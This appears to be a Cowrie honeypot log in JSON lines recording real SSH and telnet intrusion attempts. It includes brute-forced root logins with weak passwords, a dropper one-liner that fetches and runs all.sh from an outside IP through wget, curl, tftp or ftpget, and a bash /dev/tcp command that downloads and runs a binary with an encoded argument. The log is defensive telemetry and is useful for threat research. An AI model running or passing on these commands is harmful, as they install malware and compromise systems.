{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh;chmod 777 all.sh;sh ./all.sh;rm -rf all.sh","message":"CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh;chmod 777 all.sh;sh ./all.sh;rm -rf all.sh","sensor":"my-vps","timestamp":"2025-09-08T15:28:57.509830Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.session.file_download","url":"http://160.187.246.23/all.sh","outfile":"var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","shasum":"6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","sensor":"my-vps","timestamp":"2025-09-08T15:28:58.080063Z","message":"Downloaded URL (http://160.187.246.23/all.sh) with SHA-256 6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43 to var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.session.file_download","url":"http://160.187.246.23/all.sh","outfile":"var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","shasum":"6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","sensor":"my-vps","timestamp":"2025-09-08T15:28:58.388916Z","message":"Downloaded URL (http://160.187.246.23/all.sh) with SHA-256 6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43 to var/lib/cowrie/downloads/6ecab5745b1c9be448cb2689e230d898b4886361160215596474050d0298be43","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1","size":1890,"shasum":"d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1","duplicate":false,"duration":"4.0","message":"Closing TTY Log: var/lib/cowrie/tty/d200d731f57558f49a89e4061eda2a513b27639047f8700510feda1c5e2e93e1 after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:58.403150Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.session.closed","duration":4.812313079833984,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:58.403764Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36934,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d1aadad5eeb","protocol":"telnet","message":"New connection: 212.227.235.229:36934 (1.2.3.4:23) [session: 7d1aadad5eeb]","sensor":"my-vps","timestamp":"2025-09-08T15:29:17.586843Z"}
{"eventid":"cowrie.session.closed","duration":30.542298078536987,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:29:48.129066Z","src_ip":"212.227.235.229","session":"7d1aadad5eeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38509,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3964b6ec756","protocol":"telnet","message":"New connection: 212.227.125.160:38509 (1.2.3.4:23) [session: a3964b6ec756]","sensor":"my-vps","timestamp":"2025-09-08T15:30:50.066236Z"}
{"eventid":"cowrie.session.closed","duration":31.4879891872406,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:31:21.554157Z","src_ip":"212.227.125.160","session":"a3964b6ec756"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65326,"dst_ip":"1.2.3.4","dst_port":22,"session":"289cc5952c5a","protocol":"ssh","message":"New connection: 212.227.125.160:65326 (1.2.3.4:22) [session: 289cc5952c5a]","sensor":"my-vps","timestamp":"2025-09-08T15:33:01.943654Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-09-08T15:33:01.944754Z","src_ip":"212.227.125.160","session":"289cc5952c5a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:33:01.945817Z","src_ip":"212.227.125.160","session":"289cc5952c5a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57060,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e91f1db5a38","protocol":"ssh","message":"New connection: 217.72.205.35:57060 (1.2.3.4:22) [session: 9e91f1db5a38]","sensor":"my-vps","timestamp":"2025-09-08T15:35:36.808128Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:35:36.809141Z","src_ip":"217.72.205.35","session":"9e91f1db5a38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54326,"dst_ip":"1.2.3.4","dst_port":22,"session":"067a2073ee2b","protocol":"ssh","message":"New connection: 212.227.235.229:54326 (1.2.3.4:22) [session: 067a2073ee2b]","sensor":"my-vps","timestamp":"2025-09-08T15:35:38.446215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:35:38.447866Z","src_ip":"212.227.235.229","session":"067a2073ee2b"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-09-08T15:35:39.006434Z","src_ip":"212.227.235.229","session":"067a2073ee2b"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:35:40.504355Z","src_ip":"212.227.235.229","session":"067a2073ee2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50101,"dst_ip":"1.2.3.4","dst_port":23,"session":"1074e8dd5776","protocol":"telnet","message":"New connection: 212.227.125.160:50101 (1.2.3.4:23) [session: 1074e8dd5776]","sensor":"my-vps","timestamp":"2025-09-08T15:36:01.188776Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54558,"dst_ip":"1.2.3.4","dst_port":23,"session":"761e739f5c1c","protocol":"telnet","message":"New connection: 212.227.235.229:54558 (1.2.3.4:23) [session: 761e739f5c1c]","sensor":"my-vps","timestamp":"2025-09-08T15:36:13.872660Z"}
{"eventid":"cowrie.session.closed","duration":31.560689210891724,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:36:32.749401Z","src_ip":"212.227.125.160","session":"1074e8dd5776"}
{"eventid":"cowrie.session.closed","duration":31.19049048423767,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:36:45.063082Z","src_ip":"212.227.235.229","session":"761e739f5c1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39162,"dst_ip":"1.2.3.4","dst_port":22,"session":"f55f619b169f","protocol":"ssh","message":"New connection: 212.227.125.160:39162 (1.2.3.4:22) [session: f55f619b169f]","sensor":"my-vps","timestamp":"2025-09-08T15:36:46.580897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.3.0","message":"Remote SSH version: SSH-2.0-libssh-0.3.0","sensor":"my-vps","timestamp":"2025-09-08T15:36:46.740799Z","src_ip":"212.227.125.160","session":"f55f619b169f"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:36:46.905162Z","src_ip":"212.227.125.160","session":"f55f619b169f"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":51402,"dst_ip":"1.2.3.4","dst_port":22,"session":"382b0239e765","protocol":"ssh","message":"New connection: 8.138.136.155:51402 (1.2.3.4:22) [session: 382b0239e765]","sensor":"my-vps","timestamp":"2025-09-08T15:37:18.862834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T15:37:18.863823Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T15:37:18.864319Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T15:37:19.482006Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:37:20.681486Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:37:21.124495Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T15:37:21.126201Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/htypmvLz6O && chmod +x /tmp/htypmvLz6O && /tmp/htypmvLz6O xPK5XHfTYjw8fcx2Xqbgs7/kuF9+ynM5PmvTf1+x/LSy4aZadsdlODlnz25WpuC0svy6W37TazoyZc1/WrDyvavju1ZgzGA+JmLIe1S+4rS040u+eiFWzY8oINwwGE/ybM7q+g==\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/htypmvLz6O && chmod +x /tmp/htypmvLz6O && /tmp/htypmvLz6O xPK5XHfTYjw8fcx2Xqbgs7/kuF9+ynM5PmvTf1+x/LSy4aZadsdlODlnz25WpuC0svy6W37TazoyZc1/WrDyvavju1ZgzGA+JmLIe1S+4rS040u+eiFWzY8oINwwGE/ybM7q+g==\" &","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.334437Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/8Y0E5dhAcD","message":"CMD: head -c 1458464 > /tmp/8Y0E5dhAcD","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.338210Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.543869Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.548937Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.552605Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54e791deefbc42489807bd1e4fbdd9e4ef272ca36248a12ab81771045bc116f9","size":1956,"shasum":"54e791deefbc42489807bd1e4fbdd9e4ef272ca36248a12ab81771045bc116f9","duplicate":false,"duration":"6.4","message":"Closing TTY Log: var/lib/cowrie/tty/54e791deefbc42489807bd1e4fbdd9e4ef272ca36248a12ab81771045bc116f9 after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.553930Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:37:27.555202Z","src_ip":"8.138.136.155","session":"382b0239e765"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sensor":"my-vps","timestamp":"2025-09-08T15:40:40.525601Z","src_ip":"212.227.235.229","session":"067a2073ee2b"}
{"eventid":"cowrie.session.closed","duration":"302.1","message":"Connection lost after 302.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:40:40.526609Z","src_ip":"212.227.235.229","session":"067a2073ee2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48640,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d8028c939c9","protocol":"telnet","message":"New connection: 212.227.125.160:48640 (1.2.3.4:23) [session: 0d8028c939c9]","sensor":"my-vps","timestamp":"2025-09-08T15:41:45.824854Z"}
{"eventid":"cowrie.session.closed","duration":12.60036039352417,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:41:58.425148Z","src_ip":"212.227.125.160","session":"0d8028c939c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48964,"dst_ip":"1.2.3.4","dst_port":23,"session":"26530cfc1541","protocol":"telnet","message":"New connection: 212.227.125.160:48964 (1.2.3.4:23) [session: 26530cfc1541]","sensor":"my-vps","timestamp":"2025-09-08T15:41:58.590789Z"}
{"eventid":"cowrie.session.closed","duration":12.829763889312744,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:11.420485Z","src_ip":"212.227.125.160","session":"26530cfc1541"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49253,"dst_ip":"1.2.3.4","dst_port":23,"session":"095f21bec5bc","protocol":"telnet","message":"New connection: 212.227.125.160:49253 (1.2.3.4:23) [session: 095f21bec5bc]","sensor":"my-vps","timestamp":"2025-09-08T15:42:11.672104Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57116,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b71d4c58aa0","protocol":"ssh","message":"New connection: 217.72.205.35:57116 (1.2.3.4:22) [session: 3b71d4c58aa0]","sensor":"my-vps","timestamp":"2025-09-08T15:42:13.224016Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:13.226366Z","src_ip":"217.72.205.35","session":"3b71d4c58aa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27477,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a49be4da0b","protocol":"ssh","message":"New connection: 212.227.235.229:27477 (1.2.3.4:22) [session: 26a49be4da0b]","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.315409Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.316439Z","src_ip":"212.227.235.229","session":"26a49be4da0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27863,"dst_ip":"1.2.3.4","dst_port":22,"session":"58af2df4d31e","protocol":"ssh","message":"New connection: 212.227.235.229:27863 (1.2.3.4:22) [session: 58af2df4d31e]","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.427066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.428018Z","src_ip":"212.227.235.229","session":"58af2df4d31e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.564454Z","src_ip":"212.227.235.229","session":"58af2df4d31e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:42:20.975613Z","src_ip":"212.227.235.229","session":"58af2df4d31e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T15:42:21.113482Z","session":"58af2df4d31e"}
{"eventid":"cowrie.session.closed","duration":12.79769492149353,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:24.469732Z","src_ip":"212.227.125.160","session":"095f21bec5bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49551,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b05dcb53aa6","protocol":"telnet","message":"New connection: 212.227.125.160:49551 (1.2.3.4:23) [session: 8b05dcb53aa6]","sensor":"my-vps","timestamp":"2025-09-08T15:42:24.757947Z"}
{"eventid":"cowrie.session.closed","duration":12.723392009735107,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:37.481262Z","src_ip":"212.227.125.160","session":"8b05dcb53aa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49884,"dst_ip":"1.2.3.4","dst_port":23,"session":"8908c238f98b","protocol":"telnet","message":"New connection: 212.227.125.160:49884 (1.2.3.4:23) [session: 8908c238f98b]","sensor":"my-vps","timestamp":"2025-09-08T15:42:37.632361Z"}
{"eventid":"cowrie.session.closed","duration":12.831761360168457,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:42:50.464056Z","src_ip":"212.227.125.160","session":"8908c238f98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50219,"dst_ip":"1.2.3.4","dst_port":23,"session":"86cddc416a68","protocol":"telnet","message":"New connection: 212.227.125.160:50219 (1.2.3.4:23) [session: 86cddc416a68]","sensor":"my-vps","timestamp":"2025-09-08T15:42:50.637363Z"}
{"eventid":"cowrie.session.closed","duration":12.756125450134277,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:03.393416Z","src_ip":"212.227.125.160","session":"86cddc416a68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50549,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0cc444933d1","protocol":"telnet","message":"New connection: 212.227.125.160:50549 (1.2.3.4:23) [session: c0cc444933d1]","sensor":"my-vps","timestamp":"2025-09-08T15:43:03.674135Z"}
{"eventid":"cowrie.session.closed","duration":12.810063362121582,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:16.484129Z","src_ip":"212.227.125.160","session":"c0cc444933d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50862,"dst_ip":"1.2.3.4","dst_port":23,"session":"08f3fb07b409","protocol":"telnet","message":"New connection: 212.227.125.160:50862 (1.2.3.4:23) [session: 08f3fb07b409]","sensor":"my-vps","timestamp":"2025-09-08T15:43:16.660083Z"}
{"eventid":"cowrie.session.closed","duration":12.765924453735352,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:29.425942Z","src_ip":"212.227.125.160","session":"08f3fb07b409"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51171,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8381e0c4f0f","protocol":"telnet","message":"New connection: 212.227.125.160:51171 (1.2.3.4:23) [session: d8381e0c4f0f]","sensor":"my-vps","timestamp":"2025-09-08T15:43:29.637367Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:30.427379Z","src_ip":"212.227.235.229","session":"58af2df4d31e"}
{"eventid":"cowrie.session.closed","duration":12.811564207077026,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:42.448865Z","src_ip":"212.227.125.160","session":"d8381e0c4f0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51465,"dst_ip":"1.2.3.4","dst_port":23,"session":"edfd74108a0d","protocol":"telnet","message":"New connection: 212.227.125.160:51465 (1.2.3.4:23) [session: edfd74108a0d]","sensor":"my-vps","timestamp":"2025-09-08T15:43:42.696424Z"}
{"eventid":"cowrie.session.closed","duration":12.719298601150513,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:43:55.415657Z","src_ip":"212.227.125.160","session":"edfd74108a0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42338,"dst_ip":"1.2.3.4","dst_port":23,"session":"ecdc3a966e96","protocol":"telnet","message":"New connection: 212.227.125.160:42338 (1.2.3.4:23) [session: ecdc3a966e96]","sensor":"my-vps","timestamp":"2025-09-08T15:47:22.681956Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:47:22.765940Z","src_ip":"212.227.125.160","session":"ecdc3a966e96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:47:22.784255Z","src_ip":"212.227.125.160","session":"ecdc3a966e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42866,"dst_ip":"1.2.3.4","dst_port":22,"session":"f36fa685aed8","protocol":"ssh","message":"New connection: 212.227.125.160:42866 (1.2.3.4:22) [session: f36fa685aed8]","sensor":"my-vps","timestamp":"2025-09-08T15:48:22.462969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.7.3","message":"Remote SSH version: SSH-2.0-libssh-0.7.3","sensor":"my-vps","timestamp":"2025-09-08T15:48:22.634953Z","src_ip":"212.227.125.160","session":"f36fa685aed8"}
{"eventid":"cowrie.client.kex","hassh":"c8c5fbf80b7b0a1b0e4de5e683f3c5ad","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,blowfish-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","blowfish-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c8c5fbf80b7b0a1b0e4de5e683f3c5ad","sensor":"my-vps","timestamp":"2025-09-08T15:48:22.812022Z","src_ip":"212.227.125.160","session":"f36fa685aed8"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-09-08T15:48:24.723276Z","src_ip":"212.227.125.160","session":"f36fa685aed8"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:48:25.895228Z","src_ip":"212.227.125.160","session":"f36fa685aed8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58086,"dst_ip":"1.2.3.4","dst_port":22,"session":"897181ee8ddb","protocol":"ssh","message":"New connection: 217.72.205.35:58086 (1.2.3.4:22) [session: 897181ee8ddb]","sensor":"my-vps","timestamp":"2025-09-08T15:49:05.517341Z"}
